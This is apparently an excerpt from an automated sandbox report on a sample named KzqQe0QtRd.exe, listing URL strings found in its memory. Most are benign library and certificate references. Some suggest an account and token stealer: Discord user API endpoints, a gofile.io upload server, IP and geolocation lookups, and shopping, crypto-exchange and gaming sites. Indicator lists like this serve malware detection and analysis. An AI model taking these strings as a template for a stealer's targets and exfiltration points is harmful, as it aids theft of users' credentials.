00000000.00000003.209296479.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.209490690.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
Source: KzqQe0QtRd.exe, 00000001.00000002.298591685.0000022127650000.00000004.00001000.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.297603053.0000022127150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
Source: KzqQe0QtRd.exe, 00000001.00000003.277339406.000002212822D000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274467347.00000221281BD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287974669.0000022127E88000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274415999.00000221281B4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
Source: KzqQe0QtRd.exe, 00000001.00000003.274467347.00000221281BD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274415999.00000221281B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/7
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287974669.0000022127E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/ntication.
Source: KzqQe0QtRd.exeString found in binary or memory: http://schemas.m
Source: KzqQe0QtRd.exe, 00000001.00000003.292294210.0000022127CF7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280259713.0000022127CF7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275507020.0000022127CF3000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.294604335.0000022127CF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4880
Source: KzqQe0QtRd.exe, 00000001.00000003.275507020.0000022127D17000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280259713.0000022127D17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5869
Source: KzqQe0QtRd.exe, 00000001.00000003.277339406.000002212822D000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274631255.0000022128191000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
Source: KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
Source: KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
Source: KzqQe0QtRd.exe, 00000001.00000002.297603053.0000022127150000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: KzqQe0QtRd.exe, 00000001.00000003.277339406.000002212822D000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288518670.0000022127C97000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277230606.0000022127C96000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.286608073.0000022127C97000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279646443.0000022127C97000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275885170.0000022127C84000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.292764398.0000022127C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
Source: KzqQe0QtRd.exe, 00000001.00000003.219642489.0000022127336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: KzqQe0QtRd.exe, 00000001.00000003.276808444.0000022126D85000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.295661249.0000022127EE9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275479991.0000022127EE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
Source: KzqQe0QtRd.exe, 00000000.00000003.209846231.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.211083980.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.209951342.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.209421575.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.209811582.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.212280347.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.212170582.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.209677396.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.209566729.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.209890928.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.211020359.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.209248171.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.211275878.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.210532107.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.209613878.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.212514021.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.210532107.000001EF2EB61000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.209763072.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.211521899.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.209296479.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000000.00000003.209490690.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: KzqQe0QtRd.exe, 00000001.00000003.282830555.0000022127316000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287215790.000002212731F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275123747.0000022128261000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279603095.0000022127315000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275507020.0000022127D17000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280259713.0000022127D17000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.297991676.000002212732C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.289758407.0000022127329000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.292497795.000002212732C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
Source: KzqQe0QtRd.exe, 00000001.00000003.291069837.0000022127538000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.293378639.0000022127563000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275690006.0000022127535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: KzqQe0QtRd.exe, 00000001.00000003.219642489.0000022127336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: KzqQe0QtRd.exe, 00000001.00000003.274815708.00000221281D3000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274467347.00000221281BD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274415999.00000221281B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
Source: KzqQe0QtRd.exe, 00000001.00000003.287906992.0000022126E9C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274815708.00000221281D3000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274467347.00000221281BD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275709684.0000022126E65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276603902.0000022126E8B000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274037480.00000221281D7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274415999.00000221281B4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274102089.00000221281FF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280336661.0000022126E93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
Source: KzqQe0QtRd.exe, 00000001.00000003.275781948.00000221280D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
Source: KzqQe0QtRd.exe, 00000001.00000003.275364164.0000022127DB2000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277253564.0000022127DB2000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274367842.0000022127DB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aliexpress.com)z&
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazon.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org)
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://binance.com)z
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.jaraco.com/skeleton
Source: KzqQe0QtRd.exe, 00000001.00000002.298654222.0000022127760000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue44497.
Source: KzqQe0QtRd.exe, 00000001.00000003.287059855.0000022127F9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/963114349877162004/992245751247806515/unknown.png
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/963114349877162004/992593184251183195/7c8f476123d28d103efe381
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codecov.io/gh/pypa/setuptools
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coinbase.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crunchyroll.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/users/
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v6/users/
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/channels/803025117553754132/815945031150993468
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v6/users/
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disney.com)z$
Source: KzqQe0QtRd.exe, 00000001.00000003.277774285.0000022126B65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279424780.0000022126B75000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288232938.0000022126B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: KzqQe0QtRd.exe, 00000001.00000003.275835925.0000022126D48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
Source: KzqQe0QtRd.exe, 00000001.00000003.222418452.0000022127578000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.294818950.0000022127391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/pprint.html
Source: KzqQe0QtRd.exe, 00000001.00000003.222418452.0000022127578000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.294818950.0000022127391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/pprint.html#pprint.pprint
Source: KzqQe0QtRd.exe, 00000001.00000003.294548460.0000022127475000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287906992.0000022126E9C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.222529571.0000022126E01000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276727923.000002212746B000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276808444.0000022126D85000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.221301062.0000022126E01000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.286704566.000002212746C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275709684.0000022126E65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.287484083.0000022126EAE000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276603902.0000022126E8B000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280811119.0000022126E07000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288482138.000002212746C000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279135679.0000022126E04000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280410379.0000022126E05000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.221301062.0000022126E65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.222529571.0000022126E65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.280336661.0000022126E93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/re.html
Source: KzqQe0QtRd.exe, 00000001.00000002.298654222.0000022127760000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/re.html#re.sub
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ebay.com)z$
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://epicgames.com)z
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://expressvpn.com)r
Source: KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://geolocation-db.com/jsonp/z
Source: KzqQe0QtRd.exe, 00000001.00000002.298654222.0000022127760000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
Source: KzqQe0QtRd.exe, 00000001.00000003.292085021.0000022127372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: KzqQe0QtRd.exe, 00000001.00000003.215069241.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277631315.0000022126BE9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220635622.0000022126BD4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277946058.0000022124D9F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220295817.0000022126BCD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.217947214.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.216330714.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.214901072.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.216252989.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.219263959.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276673991.0000022126BC7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.294140587.0000022126BEC000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.296373170.0000022124DA1000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.218775357.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215741158.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215348853.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215954077.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215502642.0000022124DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: KzqQe0QtRd.exe, 00000001.00000002.298591685.0000022127650000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/black
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.md
Source: KzqQe0QtRd.exe, 00000001.00000002.298654222.0000022127760000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packaging
Source: KzqQe0QtRd.exe, 00000001.00000002.298654222.0000022127760000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packagingP
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/actions?query=workflow%3A%22tests%22
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/discussions
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues
Source: KzqQe0QtRd.exe, 00000001.00000002.298654222.0000022127760000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/1024.
Source: KzqQe0QtRd.exe, 00000001.00000002.297531973.0000022127030000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
Source: KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/workflows/tests/badge.svg
Source: KzqQe0QtRd.exe, 00000001.00000003.288728528.00000221273D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyparsing/pyparsing/wiki
Source: KzqQe0QtRd.exe, 00000001.00000003.215069241.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.296609743.0000022126738000.00000004.00001000.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.214901072.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215741158.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215348853.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215502642.0000022124DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: KzqQe0QtRd.exe, 00000001.00000003.215502642.0000022124DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: KzqQe0QtRd.exe, 00000001.00000003.215069241.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277631315.0000022126BE9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220635622.0000022126BD4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277946058.0000022124D9F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220295817.0000022126BCD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.217947214.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.216330714.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.214901072.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.216252989.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.219263959.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276673991.0000022126BC7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.294140587.0000022126BEC000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.296373170.0000022124DA1000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.218775357.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215741158.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215348853.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215954077.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215502642.0000022124DFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: KzqQe0QtRd.exe, 00000001.00000003.222529571.0000022126DB1000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276808444.0000022126D85000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.217520428.0000022126ED1000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.218151664.0000022126ED1000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.218478065.0000022126DE0000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.291819285.0000022126DE0000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.278923577.0000022126DDE000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220317493.0000022126DE0000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.297213465.0000022126DED000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220625598.0000022126DDA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.218900511.0000022126DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
